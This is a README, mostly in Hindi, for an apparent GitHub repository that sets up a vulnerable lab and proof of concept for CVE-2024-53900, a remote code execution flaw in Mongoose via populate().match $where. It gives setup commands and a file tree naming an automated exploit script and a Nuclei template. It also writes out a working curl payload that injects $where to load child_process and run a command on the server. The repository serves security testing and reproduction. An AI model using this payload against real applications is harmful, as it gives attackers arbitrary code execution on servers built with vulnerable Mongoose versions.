
CVE-2024-53900 के लिए प्रतिलिपि करने योग्य वातावरण और PoC, जो Mongoose में populate().match $where के माध्यम से एक गंभीर RCE है। इसमें स्वचालित शोषण स्क्रिप्ट और सुरक्षा परीक्षण के लिए Nuclei टेम्पलेट शामिल है।
यह रिपॉजिटरी CVE-2024-53900 के लिए एक पुनरुत्पादक संवेदनशील वातावरण और PoC प्रदान करता है, जो Mongoose < 8.8.3 में एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता है।
populate().match $where के साथ संयुक्तसंदर्भ:
git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900
docker-compose up -d
डिफ़ॉल्ट रूप से, संवेदनशील Node.js ऐप Docker के अंदर चलता है।
हालांकि, GUI एप्लिकेशन (जैसे xcalc या gnome-calculator) कंटेनर के अंदर लॉन्च नहीं होंगे।
👉 यदि आप कैलकुलेटर विंडो लॉन्च करके RCE प्रदर्शित करना चाहते हैं:
MongoDB को Docker में चलाएं (DB बैकएंड के रूप में)
docker run -d --name mongo -p 27017:27017 mongo:6
संवेदनशील Node.js ऐप को स्थानीय रूप से चलाएं
cd ~/cve-2024/app
npm install
node server.js
27017 पर चलता है5000 पर चलता है/home/kali/cve-2024/
├── docker-compose.yml # Environment setup
├── exploit.py # Automated exploit script
├── CVE-2024-53900.yaml # Nuclei template
├── README.md # Documentation
├── app/ # Vulnerable Node.js app
│ ├── Dockerfile
│ ├── package.json
│ ├── server.js
│ ├── models.js
│ └── views/
└── data/ # MongoDB volume
curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"
python3 exploit.py --url http://localhost:5000
nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author

mongo:6188.5.0 (संवेदनशील)4.18.2